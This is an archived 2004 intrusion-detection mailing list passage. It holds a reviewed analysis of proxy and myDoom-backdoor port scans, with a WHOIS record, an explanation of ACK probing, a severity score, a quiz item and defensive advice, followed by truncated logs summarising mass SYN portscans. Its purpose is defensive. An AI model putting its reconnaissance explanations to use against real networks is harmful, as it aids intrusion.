> remarks:      Email address for spam or abuse complaints : abuse at ocn.ad.jp
> remarks:      ************************************************
> mnt-by:       MAINT-JPNIC
> mnt-lower:    MAINT-JPNIC
> changed:      hm-changed at apnic.net 20020904
> changed:      ip-apnic at nic.ad.jp 20040413
> status:       ALLOCATED PORTABLE
> source:       APNIC
>
> role:         Japan Network Information Center
> address:      Kokusai-Kougyou-Kanda Bldg 6F, 2-3-4 Uchi-Kanda
> address:      Chiyoda-ku, Tokyo 101-0047, Japan
> country:      JP
> phone:        +81-3-5297-2311
> fax-no:       +81-3-5297-2312
> e-mail:       hostmaster at nic.ad.jp
> admin-c:      SS13-AP
> tech-c:       SY7-AP
> nic-hdl:      JNIC1-AP
> mnt-by:       MAINT-JPNIC
> changed:      apnic-ftp at nic.ad.jp 19990629
> changed:      ip-staff at nic.ad.jp 20030806
> source:       APNIC
>
> inetnum:      220.99.128.0 - 220.99.255.255
> netname:      PLALA
> descr:        Plala Networks Inc.
> country:      JP
> admin-c:      MN2905JP
> tech-c:       HS3694JP
> remarks:      This information has been partially mirrored by APNIC from
> remarks:      JPNIC. To obtain more specific information, please use the
> remarks:      JPNIC whois server at whois.nic.ad.jp. (This defaults to
> remarks:      Japanese output, use the /e switch for English output)
> changed:      apnic-ftp at nic.ad.jp 20030203
> remarks:      This information has been partially mirrored by APNIC from
> remarks:      JPNIC. To obtain more specific information, please use the
> remarks:      JPNIC whois server at whois.nic.ad.jp. (This defaults to
> remarks:      Japanese output, use the /e switch for English output)
> changed:      apnic-ftp at nic.ad.jp 20040609
> source:       JPNIC
>
> The fact that it is a valid IP address according to APNIC, and that the ports being probed may return some type of response to allow the hacker to gain access to the system, leads me to believe that the IP address is not spoofed.

Did you notify the abuse department listed above?
> 4. Description of attack:
>
> The attack is obviously a scan for Socks and squid proxies in
YES
> an attempt to locate a compromised system or one that is running
Compromised?
> the service to exploit possible vulnerabilities within the service.
>
> A CVE that covers the squid proxy vulnerability can be found at the following URL:
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0068
>
> A CAN, which is under review at this time, that covers the socks proxy vulnerability can be found at the following URL:
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0315
>
> Along with the proxies, the attacker appears to be probing for port 3127. This port is left open as a back door by the myDoom virus[1], which could be an avenue for a denial of service attack in the future, according to CERT at http://www.cert.org/incident_notes/IN-2004-01.html.

Some servers scan for proxies to prevent spammers from using open proxies to send mail to them. Did you check and see what that IP is?

> 5. Attack mechanism:
>
> The attacker is probing the network in search of responding ports. Since there are no other logs to correlate with, I can only assume that the TCP packets that are being sent are to elicit some response to find a listening or compromised host. For example, the attacker sends an unsolicited TCP packet with the ACK flag set. The normal response would be for the host to respond back with RST. If that is indeed the case, the attacker now knows that: 1) the host is alive and listening, and 2) there is no filtering in place.

Again, details on the packets might have given you a better clue as to what was going on.

> If the attacker receives no response then he can assume: 1) some type of filtering is in place, or 2) that the host is not alive.

Any other possibilities?

> If the attacker receives the response that is being solicited then he can attempt to exploit the vulnerabilities with a buffer overflow using specially crafted packets. In the case of the back door left by the myDoom virus, the attacker could possibly take control of that system to launch a denial of service attack.
>
> 6. Correlations:
>
> I found a posting at http://lists.sans.org/pipermail/unisog/2004-March/006955.php that states that they had seen some scans, particularly on the weekends, just a couple of months back. I was unable to see any other postings to correlate my findings.
>
> 7. Evidence of active targeting:
>
> It appears to be targeted in the sense that it is targeting three specific ports as possible back doors to compromised systems. Also, the attacker is scanning the full range of addresses on this particular subnet. The scans are not rapid in succession but fairly consistent.
>
> 8. Severity:
>
> severity = (criticality + lethality) - (system countermeasures + network countermeasures)
>
> Each value is ranked on a scale from 1 (lowest) to 5 (highest).
>
> Criticality: 2
>
> I believe that criticality is low based on the fact that we do not run socks or squid proxies on our network. It is possible that the myDoom virus could be introduced but active virus scanning with updated definitions is in use.
>
> Lethality: 3
>
> I do not think that this scan in itself is very lethal, but given the nature of business on my network a compromise could be very lethal. Continued monitoring of this type of scan and any other associated IP addresses should be considered.
>
> System countermeasures: 2
>
> The systems on this network are patched and updated regularly or as patches become available. The systems administrators do a fair job of ensuring that the systems are secure and up to date.
>
> Network countermeasures: 3
>
> I am happy to say that this scan was denied at the border router. The network currently uses a defense-in-depth approach. Inside the border router, which uses extensive ACLs, traffic is monitored by a network IDS. A firewall is then in place that all traffic to the internal network is routed through. The internal network is monitored by multiple network IDS on various segments along with Cisco IDS modules in the switches. Correlation with various agencies allows us to put preventative measures up at the border ahead of time.

You might want to do a network description above since you know the network.

> 9. Defensive Recommendations:
>
> The border router should be configured to block incoming requests for services that are not in use or vulnerable to remote access. If the scan is coming from a specific host, then that IP address can be blocked at the router. Firewalls should also be set to block any unused services. Since the scan also includes the port commonly associated with the myDoom virus, a full system scan with updated definitions should be done on all systems to ensure that none of the systems have been compromised.
>
> 10. Multiple choice test question:
>
> What range of ports does the myDoom virus open up and listen on?

Mydoom.a or .b?

> a. 4200-4000
> b. 3127-3198
> c. 1024-1029
> d. 135-139
>
> Answer: b.
>
> A system that has been compromised by the myDoom virus opens ports 3127-3198, according to CERT http://www.cert.org/incident_notes/IN-2004-01.html.
> --------------------------------------------------------------------------------
> [1] LinkLogger
> _______________________________________________
> Intrusions mailing list
> Intrusions at lists.sans.org
> http://www.dshield.org/mailman/listinfo/intrusions

From Ken.Connelly at uni.edu Fri Jul 2 15:28:40 2004
From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu)
Date: Fri, 02 Jul 2004 10:28:40 -0500 (CDT)
Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects
Message-ID: <01LBZDXB7W908YBZ2Y@uni.edu>

The following extracts show the beginning and ending of scan activity that was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500.

Jul 1 11:31:41 218.56.0.58:38350 -> xxx.yyy.1.0:1433 SYN ******S*
Jul 1 11:31:41 218.56.0.58:38397 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 1 11:31:41 218.56.0.58:38399 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 1 11:31:41 218.56.0.58:38403 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 1 11:31:38 218.56.0.58:38406 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 1 11:31:38 218.56.0.58:38411 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 1 11:31:39 218.56.0.58:38422 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 1 11:31:39 218.56.0.58:38426 -> xxx.yyy.1.7:1433 SYN ******S*
[...]
Jul 1 15:20:31 218.56.0.58:40234 -> xxx.yyy.255.247:1433 SYN ******S*
Jul 1 15:20:31 218.56.0.58:40261 -> xxx.yyy.255.248:1433 SYN ******S*
Jul 1 15:20:31 218.56.0.58:40312 -> xxx.yyy.255.250:1433 SYN ******S*
Jul 1 15:20:31 218.56.0.58:40295 -> xxx.yyy.255.249:1433 SYN ******S*
Jul 1 15:20:32 218.56.0.58:40350 -> xxx.yyy.255.251:1433 SYN ******S*
Jul 1 15:20:32 218.56.0.58:40363 -> xxx.yyy.255.253:1433 SYN ******S*
Jul 1 15:20:32 218.56.0.58:40356 -> xxx.yyy.255.252:1433 SYN ******S*
Jul 1 15:20:32 218.56.0.58:40394 -> xxx.yyy.255.254:1433 SYN ******S*
119463

Jul 1 14:33:34 218.64.88.131:3684 -> xxx.yyy.1.0:139 SYN ******S*
Jul 1 14:33:31 218.64.88.131:3685 -> xxx.yyy.1.1:139 SYN ******S*
Jul 1 14:33:34 218.64.88.131:3689 -> xxx.yyy.1.2:139 SYN ******S*
Jul 1 14:33:34 218.64.88.131:3690 -> xxx.yyy.1.3:139 SYN ******S*
Jul 1 14:33:34 218.64.88.131:3691 -> xxx.yyy.1.4:139 SYN ******S*
Jul 1 14:33:34 218.64.88.131:3692 -> xxx.yyy.1.5:139 SYN ******S*
Jul 1 14:33:34 218.64.88.131:3694 -> xxx.yyy.1.7:139 SYN ******S*
Jul 1 14:33:34 218.64.88.131:3698 -> xxx.yyy.1.11:139 SYN ******S*
[...]
Jul 1 14:56:59 218.64.88.131:3788 -> xxx.yyy.255.246:139 SYN ******S*
Jul 1 14:56:59 218.64.88.131:3784 -> xxx.yyy.255.244:139 SYN ******S*
Jul 1 14:56:59 218.64.88.131:3789 -> xxx.yyy.255.247:139 SYN ******S*
Jul 1 14:56:59 218.64.88.131:3804 -> xxx.yyy.255.253:139 SYN ******S*
Jul 1 14:56:59 218.64.88.131:3797 -> xxx.yyy.255.251:139 SYN ******S*
Jul 1 14:56:59 218.64.88.131:3791 -> xxx.yyy.255.249:139 SYN ******S*
Jul 1 14:56:59 218.64.88.131:3792 -> xxx.yyy.255.250:139 SYN ******S*
Jul 1 14:56:59 218.64.88.131:3798 -> xxx.yyy.255.252:139 SYN ******S*
99404

Jul 1 03:30:29 80.80.19.12:2467 -> xxx.yyy.1.1:139 SYN ******S*
Jul 1 03:30:29 80.80.19.12:2468 -> xxx.yyy.1.2:139 SYN ******S*
Jul 1 03:30:29 80.80.19.12:2469 -> xxx.yyy.1.3:139 SYN ******S*
Jul 1 03:30:26 80.80.19.12:2470 -> xxx.yyy.1.4:139 SYN ******S*
Jul 1 03:30:29 80.80.19.12:2471 -> xxx.yyy.1.5:139 SYN ******S*
Jul 1 03:30:29 80.80.19.12:2472 -> xxx.yyy.1.6:139 SYN ******S*
Jul 1 03:30:29 80.80.19.12:2473 -> xxx.yyy.1.7:139 SYN ******S*
Jul 1 03:30:29 80.80.19.12:2474 -> xxx.yyy.1.8:139 SYN ******S*
[...]
Jul 1 03:41:22 80.80.19.12:2524 -> xxx.yyy.255.190:139 SYN ******S*
Jul 1 03:41:22 80.80.19.12:2521 -> xxx.yyy.255.187:139 SYN ******S*
Jul 1 03:41:22 80.80.19.12:2525 -> xxx.yyy.255.191:139 SYN ******S*
Jul 1 03:41:22 80.80.19.12:2519 -> xxx.yyy.255.185:139 SYN ******S*
Jul 1 03:41:22 80.80.19.12:2522 -> xxx.yyy.255.188:139 SYN ******S*
Jul 1 03:41:23 80.80.19.12:2530 -> xxx.yyy.255.196:139 SYN ******S*
Jul 1 03:41:23 80.80.19.12:2531 -> xxx.yyy.255.197:139 SYN ******S*
Jul 1 03:41:23 80.80.19.12:2529 -> xxx.yyy.255.195:139 SYN ******S*
74490

Jul 1 03:03:18 195.66.179.252:3758 -> xxx.yyy.1.1:139 SYN ******S*
Jul 1 03:03:15 195.66.179.252:3759 -> xxx.yyy.1.2:139 SYN ******S*
Jul 1 03:03:18 195.66.179.252:3760 -> xxx.yyy.1.3:139 SYN ******S*
Jul 1 03:03:18 195.66.179.252:3761 -> xxx.yyy.1.4:139 SYN ******S*
Jul 1 03:03:18 195.66.179.252:3762 -> xxx.yyy.1.5:139 SYN ******S*
Jul 1 03:03:18 195.66.179.252:3763 -> xxx.yyy.1.6:139 SYN ******S*
Jul 1 03:03:18 195.66.179.252:3764 -> xxx.yyy.1.7:139 SYN ******S*
Jul 1 03:03:18 195.66.179.252:3765 -> xxx.yyy.1.8:139 SYN ******S*
[...]
Jul 1 03:14:30 195.66.179.252:2533 -> xxx.yyy.255.238:139 SYN ******S*
Jul 1 03:14:30 195.66.179.252:2536 -> xxx.yyy.255.241:139 SYN ******S*
Jul 1 03:14:30 195.66.179.252:2546 -> xxx.yyy.255.251:139 SYN ******S*
Jul 1 03:14:30 195.66.179.252:2543 -> xxx.yyy.255.248:139 SYN ******S*
Jul 1 03:14:30 195.66.179.252:2547 -> xxx.yyy.255.252:139 SYN ******S*
Jul 1 03:14:30 195.66.179.252:2544 -> xxx.yyy.255.249:139 SYN ******S*
Jul 1 03:14:30 195.66.179.252:2548 -> xxx.yyy.255.253:139 SYN ******S*
Jul 1 03:14:30 195.66.179.252:2545 -> xxx.yyy.255.250:139 SYN ******S*
Jul 1 03:14:30 195.66.179.252:2549 -> xxx.yyy.255.254:139 SYN ******S*
74344

Jul 1 09:31:09 4.19.130.211:2038 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 1 09:31:09 4.19.130.211:2039 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 1 09:31:09 4.19.130.211:2040 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 1 09:31:09 4.19.130.211:2041 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 1 09:31:09 4.19.130.211:2042 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 1 09:31:09 4.19.130.211:2043 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 1 09:31:06 4.19.130.211:2044 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 1 09:31:09 4.19.130.211:2045 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 1 09:42:56 4.19.130.211:3703 -> xxx.yyy.255.244:1433 SYN ******S*
Jul 1 09:42:56 4.19.130.211:3709 -> xxx.yyy.255.250:1433 SYN ******S*
Jul 1 09:42:56 4.19.130.211:3706 -> xxx.yyy.255.247:1433 SYN ******S*
Jul 1 09:42:56 4.19.130.211:3710 -> xxx.yyy.255.251:1433 SYN ******S*
Jul 1 09:42:56 4.19.130.211:3707 -> xxx.yyy.255.248:1433 SYN ******S*
Jul 1 09:42:56 4.19.130.211:3704 -> xxx.yyy.255.245:1433 SYN ******S*
Jul 1 09:42:56 4.19.130.211:3711 -> xxx.yyy.255.252:1433 SYN ******S*
Jul 1 09:42:56 4.19.130.211:3713 -> xxx.yyy.255.254:1433 SYN ******S*
72803

Jul 1 14:12:58 147.31.180.129:3199 -> xxx.yyy.1.1:4000 SYN ******S*
Jul 1 14:12:58 147.31.180.129:3200 -> xxx.yyy.1.2:4000 SYN ******S*
Jul 1 14:12:58 147.31.180.129:3201 -> xxx.yyy.1.3:4000 SYN ******S*
Jul 1 14:12:57 147.31.180.129:3202 -> xxx.yyy.1.4:4000 SYN ******S*
Jul 1 14:12:57 147.31.180.129:3203 -> xxx.yyy.1.5:4000 SYN ******S*
Jul 1 14:13:00 147.31.180.129:3204 -> xxx.yyy.1.6:4000 SYN ******S*
Jul 1 14:13:00 147.31.180.129:3205 -> xxx.yyy.1.7:4000 SYN ******S*
Jul 1 14:13:00 147.31.180.129:3206 -> xxx.yyy.1.8:4000 SYN ******S*
[...]
Jul 1 14:24:58 147.31.180.129:4781 -> xxx.yyy.255.211:4000 SYN ******S*
Jul 1 14:24:58 147.31.180.129:4782 -> xxx.yyy.255.212:4000 SYN ******S*
Jul 1 14:24:58 147.31.180.129:4786 -> xxx.yyy.255.216:4000 SYN ******S*
Jul 1 14:24:58 147.31.180.129:4783 -> xxx.yyy.255.213:4000 SYN ******S*
Jul 1 14:24:58 147.31.180.129:4784 -> xxx.yyy.255.214:4000 SYN ******S*
Jul 1 14:24:58 147.31.180.129:4780 -> xxx.yyy.255.210:4000 SYN ******S*
Jul 1 14:24:59 147.31.180.129:4789 -> xxx.yyy.255.219:4000 SYN ******S*
Jul 1 14:24:59 147.31.180.129:4790 -> xxx.yyy.255.220:4000 SYN ******S*
69734

Jul 1 18:36:48 61.153.9.3:2389 -> xxx.yyy.1.0:1433 SYN ******S*
Jul 1 18:36:48 61.153.9.3:2390 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 1 18:36:45 61.153.9.3:2391 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 1 18:36:48 61.153.9.3:2392 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 1 18:36:45 61.153.9.3:2393 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 1 18:36:48 61.153.9.3:2394 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 1 18:36:45 61.153.9.3:2395 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 1 18:36:48 61.153.9.3:2396 -> xxx.yyy.1.7:1433 SYN ******S*
[...]
Jul 1 22:25:31 61.153.9.3:1739 -> xxx.yyy.255.240:1433 SYN ******S*
Jul 1 22:25:31 61.153.9.3:1741 -> xxx.yyy.255.242:1433 SYN ******S*
Jul 1 22:25:31 61.153.9.3:1743 -> xxx.yyy.255.244:1433 SYN ******S*
Jul 1 22:25:31 61.153.9.3:1744 -> xxx.yyy.255.245:1433 SYN ******S*
Jul 1 22:25:31 61.153.9.3:1745 -> xxx.yyy.255.246:1433 SYN ******S*
Jul 1 22:25:31 61.153.9.3:1746 -> xxx.yyy.255.247:1433 SYN ******S*
Jul 1 22:25:32 61.153.9.3:1748 -> xxx.yyy.255.249:1433 SYN ******S*
Jul 1 22:25:32 61.153.9.3:1752 -> xxx.yyy.255.253:1433 SYN ******S*
69023

Jul 1 17:11:13 61.222.172.54:56482 -> xxx.yyy.1.0:443 SYN ******S*
Jul 1 17:11:13 61.222.172.54:56483 -> xxx.yyy.1.1:443 SYN ******S*
Jul 1 17:11:13 61.222.172.54:56484 -> xxx.yyy.1.2:443 SYN ******S*
Jul 1 17:11:13 61.222.172.54:56485 -> xxx.yyy.1.3:443 SYN ******S*
Jul 1 17:11:16 61.222.172.54:56486 -> xxx.yyy.1.4:443 SYN ******S*
Jul 1 17:11:13 61.222.172.54:56487 -> xxx.yyy.1.5:443 SYN ******S*
Jul 1 17:11:16 61.222.172.54:56488 -> xxx.yyy.1.6:443 SYN ******S*
Jul 1 17:11:16 61.222.172.54:56489 -> xxx.yyy.1.7:443 SYN ******S*
[...]
Jul 1 17:20:11 61.222.172.54:36892 -> xxx.yyy.243.44:80 SYN ******S*
Jul 1 17:20:11 61.222.172.54:36893 -> xxx.yyy.244.55:80 SYN ******S*
Jul 1 17:20:11 61.222.172.54:36894 -> xxx.yyy.244.7:80 SYN ******S*
Jul 1 17:20:11 61.222.172.54:36895 -> xxx.yyy.244.92:80 SYN ******S*
Jul 1 17:20:11 61.222.172.54:36896 -> xxx.yyy.248.231:80 SYN ******S*
Jul 1 17:20:11 61.222.172.54:36897 -> xxx.yyy.248.4:80 SYN ******S*
Jul 1 17:20:11 61.222.172.54:36898 -> xxx.yyy.248.80:80 SYN ******S*
Jul 1 17:20:11 61.222.172.54:36899 -> xxx.yyy.249.5:80 SYN ******S*
Jul 1 17:20:11 61.222.172.54:36901 -> xxx.yyy.253.39:80 SYN ******S*
61383

Jul 1 03:52:31 217.88.214.44:3426 -> xxx.yyy.1.1:8000 SYN ******S*
Jul 1 03:52:31 217.88.214.44:3427 -> xxx.yyy.1.2:8000 SYN ******S*
Jul 1 03:52:31 217.88.214.44:3428 -> xxx.yyy.1.3:8000 SYN ******S*
Jul 1 03:52:32 217.88.214.44:3429 -> xxx.yyy.1.4:8000 SYN ******S*
Jul 1 03:52:32 217.88.214.44:3430 -> xxx.yyy.1.5:8000 SYN ******S*
Jul 1 03:52:29 217.88.214.44:3431 -> xxx.yyy.1.6:8000 SYN ******S*
Jul 1 03:52:29 217.88.214.44:3432 -> xxx.yyy.1.7:8000 SYN ******S*
Jul 1 03:52:32 217.88.214.44:3433 -> xxx.yyy.1.8:8000 SYN ******S*
[...]
Jul 1 04:03:26 217.88.214.44:4110 -> xxx.yyy.255.150:8000 SYN ******S* Jul 1 04:03:26 217.88.214.44:4117 -> xxx.yyy.255.157:8000 SYN ******S* Jul 1 04:03:26 217.88.214.44:4118 -> xxx.yyy.255.158:8000 SYN ******S* Jul 1 04:03:26 217.88.214.44:4119 -> xxx.yyy.255.159:8000 SYN ******S* Jul 1 04:03:27 217.88.214.44:4127 -> xxx.yyy.255.167:8000 SYN ******S* Jul 1 04:03:27 217.88.214.44:4128 -> xxx.yyy.255.168:8000 SYN ******S* Jul 1 04:03:27 217.88.214.44:4129 -> xxx.yyy.255.169:8000 SYN ******S* Jul 1 04:03:27 217.88.214.44:4130 -> xxx.yyy.255.170:8000 SYN ******S* Jul 1 04:03:27 217.88.214.44:4177 -> xxx.yyy.255.216:8000 SYN ******S* 51022 Jul 1 13:04:02 4.131.17.234:4052 -> xxx.yyy.104.2:1433 SYN ******S* Jul 1 13:04:02 4.131.17.234:4033 -> xxx.yyy.104.0:1433 SYN ******S* Jul 1 13:04:02 4.131.17.234:4050 -> xxx.yyy.104.1:1433 SYN ******S* Jul 1 13:04:02 4.131.17.234:4113 -> xxx.yyy.104.3:1433 SYN ******S* Jul 1 13:04:03 4.131.17.234:4194 -> xxx.yyy.104.5:1433 SYN ******S* Jul 1 13:04:06 4.131.17.234:4214 -> xxx.yyy.104.6:1433 SYN ******S* Jul 1 13:04:04 4.131.17.234:4189 -> xxx.yyy.104.4:1433 SYN ******S* Jul 1 13:04:05 4.131.17.234:4235 -> xxx.yyy.104.7:1433 SYN ******S* [...] 
Jul 1 14:29:38 4.131.17.234:3914 -> xxx.yyy.199.135:1433 SYN ******S* Jul 1 14:29:38 4.131.17.234:3915 -> xxx.yyy.199.136:1433 SYN ******S* Jul 1 14:29:38 4.131.17.234:3327 -> xxx.yyy.199.77:1433 SYN ******S* Jul 1 14:29:39 4.131.17.234:3692 -> xxx.yyy.199.105:1433 SYN ******S* Jul 1 14:29:39 4.131.17.234:3336 -> xxx.yyy.199.78:1433 SYN ******S* Jul 1 14:29:39 4.131.17.234:3934 -> xxx.yyy.199.137:1433 SYN ******S* Jul 1 14:29:39 4.131.17.234:3703 -> xxx.yyy.199.106:1433 SYN ******S* Jul 1 14:29:39 4.131.17.234:3948 -> xxx.yyy.199.138:1433 SYN ******S* 48622 Jul 1 01:15:25 211.141.118.92:3772 -> xxx.yyy.1.1:4899 SYN ******S* Jul 1 01:15:25 211.141.118.92:3774 -> xxx.yyy.1.2:4899 SYN ******S* Jul 1 01:15:25 211.141.118.92:3778 -> xxx.yyy.1.3:4899 SYN ******S* Jul 1 01:15:23 211.141.118.92:3779 -> xxx.yyy.1.4:4899 SYN ******S* Jul 1 01:15:23 211.141.118.92:3780 -> xxx.yyy.1.5:4899 SYN ******S* Jul 1 01:15:23 211.141.118.92:3782 -> xxx.yyy.1.6:4899 SYN ******S* Jul 1 01:15:23 211.141.118.92:3786 -> xxx.yyy.1.8:4899 SYN ******S* Jul 1 01:15:23 211.141.118.92:3794 -> xxx.yyy.1.9:4899 SYN ******S* [...] 
Jul 1 01:19:00 211.141.118.92:3592 -> xxx.yyy.255.151:4899 SYN ******S* Jul 1 01:19:00 211.141.118.92:3613 -> xxx.yyy.255.164:4899 SYN ******S* Jul 1 01:19:00 211.141.118.92:3616 -> xxx.yyy.255.167:4899 SYN ******S* Jul 1 01:19:00 211.141.118.92:3595 -> xxx.yyy.255.154:4899 SYN ******S* Jul 1 01:19:00 211.141.118.92:3603 -> xxx.yyy.255.156:4899 SYN ******S* Jul 1 01:19:00 211.141.118.92:3619 -> xxx.yyy.255.170:4899 SYN ******S* Jul 1 01:19:00 211.141.118.92:3611 -> xxx.yyy.255.162:4899 SYN ******S* Jul 1 01:19:00 211.141.118.92:3608 -> xxx.yyy.255.159:4899 SYN ******S* 45413 Jul 1 05:34:50 209.177.247.82:2669 -> xxx.yyy.1.1:4899 SYN ******S* Jul 1 05:34:50 209.177.247.82:2670 -> xxx.yyy.1.2:4899 SYN ******S* Jul 1 05:34:50 209.177.247.82:2671 -> xxx.yyy.1.3:4899 SYN ******S* Jul 1 05:34:49 209.177.247.82:2672 -> xxx.yyy.1.4:4899 SYN ******S* Jul 1 05:34:49 209.177.247.82:2673 -> xxx.yyy.1.5:4899 SYN ******S* Jul 1 05:34:49 209.177.247.82:2674 -> xxx.yyy.1.6:4899 SYN ******S* Jul 1 05:34:49 209.177.247.82:2675 -> xxx.yyy.1.7:4899 SYN ******S* Jul 1 05:34:49 209.177.247.82:2676 -> xxx.yyy.1.8:4899 SYN ******S* [...] 
Jul 1 05:39:48 209.177.247.82:1777 -> xxx.yyy.255.247:4899 SYN ******S* Jul 1 05:39:48 209.177.247.82:1778 -> xxx.yyy.255.248:4899 SYN ******S* Jul 1 05:39:48 209.177.247.82:1779 -> xxx.yyy.255.249:4899 SYN ******S* Jul 1 05:39:48 209.177.247.82:1780 -> xxx.yyy.255.250:4899 SYN ******S* Jul 1 05:39:48 209.177.247.82:1781 -> xxx.yyy.255.251:4899 SYN ******S* Jul 1 05:39:48 209.177.247.82:1782 -> xxx.yyy.255.252:4899 SYN ******S* Jul 1 05:39:48 209.177.247.82:1783 -> xxx.yyy.255.253:4899 SYN ******S* Jul 1 05:39:48 209.177.247.82:1784 -> xxx.yyy.255.254:4899 SYN ******S* 44858 Jul 1 21:38:35 212.62.131.5:1856 -> xxx.yyy.1.0:139 SYN ******S* Jul 1 21:38:35 212.62.131.5:1858 -> xxx.yyy.1.1:139 SYN ******S* Jul 1 21:38:35 212.62.131.5:1860 -> xxx.yyy.1.2:139 SYN ******S* Jul 1 21:38:35 212.62.131.5:1862 -> xxx.yyy.1.3:139 SYN ******S* Jul 1 21:38:35 212.62.131.5:1864 -> xxx.yyy.1.4:139 SYN ******S* Jul 1 21:38:35 212.62.131.5:1866 -> xxx.yyy.1.5:139 SYN ******S* Jul 1 21:38:35 212.62.131.5:1868 -> xxx.yyy.1.6:139 SYN ******S* Jul 1 21:38:35 212.62.131.5:1870 -> xxx.yyy.1.7:139 SYN ******S* [...] 
Jul 1 21:39:27 212.62.131.5:1872 -> xxx.yyy.255.238:139 SYN ******S* Jul 1 21:39:27 212.62.131.5:1824 -> xxx.yyy.255.239:139 SYN ******S* Jul 1 21:39:27 212.62.131.5:1826 -> xxx.yyy.255.240:139 SYN ******S* Jul 1 21:39:27 212.62.131.5:1838 -> xxx.yyy.255.246:139 SYN ******S* Jul 1 21:39:27 212.62.131.5:1840 -> xxx.yyy.255.247:139 SYN ******S* Jul 1 21:39:27 212.62.131.5:1842 -> xxx.yyy.255.248:139 SYN ******S* Jul 1 21:39:27 212.62.131.5:1844 -> xxx.yyy.255.249:139 SYN ******S* Jul 1 21:39:27 212.62.131.5:1846 -> xxx.yyy.255.250:139 SYN ******S* Jul 1 21:39:27 212.62.131.5:1854 -> xxx.yyy.255.254:139 SYN ******S* 38786 Jul 1 08:14:30 61.155.107.210:63290 -> xxx.yyy.1.1:4899 SYN ******S* Jul 1 08:14:30 61.155.107.210:46435 -> xxx.yyy.1.3:4899 SYN ******S* Jul 1 08:14:30 61.155.107.210:54528 -> xxx.yyy.1.5:4899 SYN ******S* Jul 1 08:14:30 61.155.107.210:33439 -> xxx.yyy.1.7:4899 SYN ******S* Jul 1 08:14:30 61.155.107.210:6686 -> xxx.yyy.1.10:4899 SYN ******S* Jul 1 08:14:32 61.155.107.210:28488 -> xxx.yyy.1.14:4899 SYN ******S* Jul 1 08:14:30 61.155.107.210:40868 -> xxx.yyy.1.16:4899 SYN ******S* Jul 1 08:14:30 61.155.107.210:60856 -> xxx.yyy.1.17:4899 SYN ******S* [...] 
Jul 1 08:31:00 61.155.107.210:20502 -> xxx.yyy.255.114:4899 SYN ******S* Jul 1 08:31:00 61.155.107.210:29773 -> xxx.yyy.255.118:4899 SYN ******S* Jul 1 08:31:00 61.155.107.210:64287 -> xxx.yyy.255.128:4899 SYN ******S* Jul 1 08:31:02 61.155.107.210:42074 -> xxx.yyy.255.241:4899 SYN ******S* Jul 1 08:31:02 61.155.107.210:45808 -> xxx.yyy.255.240:4899 SYN ******S* Jul 1 08:31:02 61.155.107.210:13425 -> xxx.yyy.255.244:4899 SYN ******S* Jul 1 08:31:02 61.155.107.210:19462 -> xxx.yyy.255.242:4899 SYN ******S* Jul 1 08:31:02 61.155.107.210:63687 -> xxx.yyy.255.239:4899 SYN ******S* Jul 1 08:31:02 61.155.107.210:53999 -> xxx.yyy.255.245:4899 SYN ******S* 22912 Jul 1 11:31:47 4.131.22.180:3085 -> xxx.yyy.1.5:1433 SYN ******S* Jul 1 11:31:47 4.131.22.180:3101 -> xxx.yyy.1.11:1433 SYN ******S* Jul 1 11:31:47 4.131.22.180:3056 -> xxx.yyy.1.0:1433 SYN ******S* Jul 1 11:31:47 4.131.22.180:3083 -> xxx.yyy.1.3:1433 SYN ******S* Jul 1 11:31:47 4.131.22.180:3086 -> xxx.yyy.1.6:1433 SYN ******S* Jul 1 11:31:47 4.131.22.180:3103 -> xxx.yyy.1.12:1433 SYN ******S* Jul 1 11:31:47 4.131.22.180:3105 -> xxx.yyy.1.13:1433 SYN ******S* Jul 1 11:31:47 4.131.22.180:3071 -> xxx.yyy.1.1:1433 SYN ******S* [...] 
Jul 1 12:50:36 4.131.22.180:4985 -> xxx.yyy.88.192:1433 SYN ******S* Jul 1 12:50:36 4.131.22.180:3418 -> xxx.yyy.88.230:1433 SYN ******S* Jul 1 12:50:36 4.131.22.180:3423 -> xxx.yyy.88.231:1433 SYN ******S* Jul 1 12:50:36 4.131.22.180:3435 -> xxx.yyy.88.232:1433 SYN ******S* Jul 1 12:50:36 4.131.22.180:3380 -> xxx.yyy.88.223:1433 SYN ******S* Jul 1 12:50:36 4.131.22.180:3416 -> xxx.yyy.88.229:1433 SYN ******S* Jul 1 12:50:36 4.131.22.180:3020 -> xxx.yyy.88.193:1433 SYN ******S* Jul 1 12:50:36 4.131.22.180:4984 -> xxx.yyy.88.191:1433 SYN ******S* Jul 1 12:50:36 4.131.22.180:3382 -> xxx.yyy.88.224:1433 SYN ******S* 20685 Jul 1 10:36:14 82.37.132.10:1179 -> xxx.yyy.1.0:1433 SYN ******S* Jul 1 10:36:17 82.37.132.10:1181 -> xxx.yyy.1.1:1433 SYN ******S* Jul 1 10:36:17 82.37.132.10:1189 -> xxx.yyy.1.4:1433 SYN ******S* Jul 1 10:36:17 82.37.132.10:1194 -> xxx.yyy.1.5:1433 SYN ******S* Jul 1 10:36:17 82.37.132.10:1197 -> xxx.yyy.1.6:1433 SYN ******S* Jul 1 10:36:17 82.37.132.10:1201 -> xxx.yyy.1.7:1433 SYN ******S* Jul 1 10:36:17 82.37.132.10:1204 -> xxx.yyy.1.8:1433 SYN ******S* Jul 1 10:36:17 82.37.132.10:1207 -> 